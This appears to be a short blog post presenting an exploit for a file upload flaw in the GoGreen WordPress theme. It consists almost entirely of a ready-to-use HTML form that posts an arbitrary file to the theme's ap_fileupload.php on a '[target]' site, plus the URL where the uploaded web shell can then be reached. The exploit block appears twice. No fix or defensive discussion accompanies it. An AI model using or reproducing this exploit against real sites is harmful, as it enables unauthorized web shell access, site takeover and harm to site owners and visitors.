Exploit : /wp-content/themes/gogreen/addpress/includes/ap_fileupload.php
Source code:
<h1>Umbrella-Security GoGreen WordPress Exploit</h1>
<br>
<form enctype="multipart/form-data"
action="http://www.[target].com/wp-content/themes/gogreen/addpress/includes/ap_fileupload.php" method="post">
Home Url: <input name="homeurl" type="text" value="http://" />
</br>
Template: <input name="template" type="text" value="gogreen">
</br>
Dir1: <input name="themeroot" type="text" />
</br>
Dir2: <input name="dir" type="text" />
</br>
File: <input name="file_upload" type="file" /><br />
<input type="submit" value="upload" />
</form>
Shell Access: http://www.[target].com/wp-content/themes/gogreen/addpress/includes/YourFolderName/YourShell.php
Source code:
<h1>Umbrella-Security GoGreen WordPress Exploit</h1>
<br>
<form enctype="multipart/form-data"
action="http://www.[target].com/wp-content/themes/gogreen/addpress/includes/ap_fileupload.php" method="post">
Home Url: <input name="homeurl" type="text" value="http://" />
</br>
Template: <input name="template" type="text" value="gogreen">
</br>
Dir1: <input name="themeroot" type="text" />
</br>
Dir2: <input name="dir" type="text" />
</br>
File: <input name="file_upload" type="file" /><br />
<input type="submit" value="upload" />
</form>
Shell Access: http://www.[target].com/wp-content/themes/gogreen/addpress/includes/YourFolderName/YourShell.php
0 Komentar untuk "WordPress GoGreen File Upload Vulnerability"